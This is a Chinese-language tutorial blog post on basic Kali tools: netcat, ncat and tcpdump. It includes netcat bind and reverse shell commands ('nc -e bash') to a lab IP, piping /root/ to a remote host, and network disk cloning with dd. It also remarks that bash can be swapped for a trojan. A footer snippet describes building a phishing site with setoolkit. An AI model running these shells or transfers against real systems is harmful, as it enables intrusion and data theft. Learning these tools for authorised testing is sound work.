Kali渗透(—):基本工具

简介:

NETCAT(NC)

网络工具中的瑞士军刀,小巧而强大, 
但由于其不加密,所以可能会被嗅探

telnet/获取banner信息

可以连接服务器的端口,然后进行各种操作 
nc [-options] hostname port[s] 
nc -nv 10.1.1.1 110 
nc -nv 10.1.1.1 25 
nc -nv 10.1.1.1 80

-n:不进行域名解析 
-v:详细模式

传输文本信息

可用于远程电子取证,信息收集

监听端口 
nc -lp 端口 
nc -lp 8888 
连接端口 
nc -nv 主机 端口
nc -nv 172.16.10.10 8888

-l: (listen)监听模式 
-p: 端口模式

传输文件/目录

假如我想传输一个文件: file

接收方监听端口并输出文件: 
nc -lp 端口 > 文件 
nc -lp 8888 > dying.mp4 
发送方连接并导入文件: 
nc -nv 主机 端口 < 文件 [-q] [秒数] 
nc -nv 172.16.10.10 8888 < dying.mp4 -q 1

-q [秒]:指定命令完成后几秒退出

如果不指定秒数,需要手动ctrl+D结束

或者更传统意义上的文件传输: 
发送方监听端口并导入文件: 
nc -q 1 -lp 端口 < 文件
接收方连接并输出文件: 
nc -nv 主机 端口 > 文件

那么我想传送一个目录呢?nc默认是不支持目录的直接传递的。但我们可以换一个思想,将目录打包成文件传递过去,并在输出的时候直接解压不就很完美了吗。

发送方: 
tar czvf - 目录 | nc -lp 端口 [-q] [秒数] 
tar czvf - /root/ | nc -lp 8888 -q 1 
接收方: 
nc -nv 主机 端口 | tar xzvf - 
nc -nv 172.16.10.10 8888 | tar xzvf -

加密传输文件

根据上面的各种操作,想必你差不多已经了解了nc的各种用法并且也猜到了加密传递的用法。

但我不推荐这么使用,因为很复杂,后面会介绍更方便的工具

先安装mcrypt,因为Kali默认不集成这个工具 
apt-get install mcrypt -y 
接收方: 
nc -lp 8888 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4 
发送方: 
mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 172.16.10.10 8888 -q 1

远程控制

正向布属: 
服务器监听: 
nc -lp 8888 -e bash 
-e:exec(执行) 
客户端连接: 
nc -nv 172.16.10.10 8888

反向布属: 
考虑到存在于DMZ区域的主机可能无法直接访问外部网络 
DMZ区域主机: 
nc -lp 8888 
客户端: 
nc -nv 172.16.10.10 8888 -e bash

bash换成文件或木马就可以远程执行了 
Windows用户可换成CMD

流媒体服务器

服务器: 
cat file.mp4 | nc -lp 8888 
客户端: 
nc -nv 172.16.10.10 8888 | mplayer -vo x11 cache 3000 -

端口扫描

和连接差不多的使用,加个-z参数就行了 
nc -nvz 主机 端口/批量端口 
nc -nvz 172.16.10.10 1-2000 
默认扫描tcp端口,你可以加上-u参数扫描udp端口 
nc -nvzu 主机 端口/批量端口

远程克隆硬盘

利用dd命令进行块级别的克隆硬盘 
接收方: 
nc -lp 端口 | dd of=/dev/sdb 
发送方: 
dd if=/dev/sda | nc -nv 主机 端口

NCAT

因为nc不包含身份验证和加密能力,所以在公网上使用会很不安全 
而ncat就集成了这些功能,其包含在nmap工具中 
服务器端: 
ncat -e bash --allow 主机 -nvl 端口 --ssl 
只允许[ip]客户端登录,并采用ssl加密通道,ncat的参数和nc一模一样 
客户端: 
ncat -nv 主机 端口 --ssl

TCPDUMP

通常Linux不安装图形化界面,所以wireshark的使用我们以后再讲, 
这里先说内置的抓包命令tcpdump

抓包

监听网卡 
tcpdump -i eth0 -s 0 -w file.pcap 
监听TCP/UDP端口 
tcpdump -i eth0 tcp port 22 
读取保存的包文件 
tcpdump -A/Xr file.pcap

-i 指定网卡 
-s 指定抓取数据大小,0为不限制 
-w 不显示过程并将数据写入文件 
-r 读取包文件 
-A 以ACSII码显示 
-X 以十六进制形式显示

筛选

通常搭配awk使用

打印第三列数据并去除重复 
tcpdump [-n] -r 文件 | awk '{print $3}' | sort -u 
筛选来源地址 
tcpdump [-n] src host 主机 -r 文件] 
筛选目的地址 
tcpdump [-n] dst host 主机 -r 文件 
筛选端口 
tcpdump [-n] port 端口 -r 文件

-n 不把IP地址解析成域名

高级筛选

tcpdump还可以针对TCP报文的标签位进行筛选,

Alt text

一行TCP报文有32位/4个字节的大小, 
标签位在第14个字节上, 
但因为计数是从0开始,所以写的时候就是第13而不是14了

Alt text

如果你想筛选确认位和推送位为1的情况,将其转换成十进制,也就是24

tcpdump -A -n 'tcp[13] = 24' -r 文件

有的教程显示TCP报文是6个标签位,这不会造成影响

Anzeme

2017/10/26


 

本文转自 新网学会 51CTO博客,原文链接:http://blog.51cto.com/xwxhvip/1976371 ,如需转载请自行联系原作者

相关文章
|
3月前
|
网络安全 虚拟化
【网络安全 | 工具】Kali虚拟机安装教程及报错详析
【网络安全 | 工具】Kali虚拟机安装教程及报错详析
109 0
【网络安全 | 工具】Kali虚拟机安装教程及报错详析
|
4月前
|
网络协议 网络安全 Go
Kali下安装渗透测试常用工具dnsx和dirsearch
Kali下安装渗透测试常用工具dnsx和dirsearch
119 0
|
4月前
|
安全 Linux 测试技术
深入Kali Linux:高级渗透测试技术详解
深入Kali Linux:高级渗透测试技术详解
188 0
|
前端开发 Linux 网络安全
kali linux 网络渗透测试学习笔记(一)Nmap工具进行端口扫描
一.利用Nmap扫描网站服务器的端口开放情况首先打开我们的kali linux才做系统,再打开其命令行模式,输入:nmap www.csdn.net 如下图所示:   因此,通过这个结果可以表明csdn上的端口开放了80端口以及443端口吗,这两个端口都十分重要,因为80端口适用于给用户呈现出数据,给用户看网站用的,443端口也是一个比较重要的端口。
2179 0
|
11月前
|
缓存 网络协议 Ubuntu
网络安全——kali_Linux基本命令大全
网络安全——kali_Linux基本命令大全
121 0
|
监控 安全 Linux
|
Web App开发 Java 测试技术
kali linux 网络渗透测试学习笔记(三)社会工程学之Java攻击:钓鱼网站制作
一.进入kali linux系统的命令行模式 输入代码; ifconfig 查看获得本机IP地址为:192.168.43.227 然后输入代码:   setoolkit   出现以下界面:       在set后输入1. 二.开始重复输入数字代号 三.写入钓鱼网站的目标 正如下图所示,我们需要先输入本机的IP地址以及端口,之后输入钓鱼网站的网址,这里我们以百度为例,因此输入https://www.baidu.com。
2253 0
|
安全 Linux 测试技术
基于Kali-Linu的一次渗透
1.什么是KaliLinux2.Kali-Linux的功能介绍3.Kali-Linux的基本教程
2913 0
|
安全 测试技术
fsociety-kali下渗透框架
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396738 说明:文章啥时候发表的,kali就指代发表所在月份的kali系统版本。
1481 0

热门文章

最新文章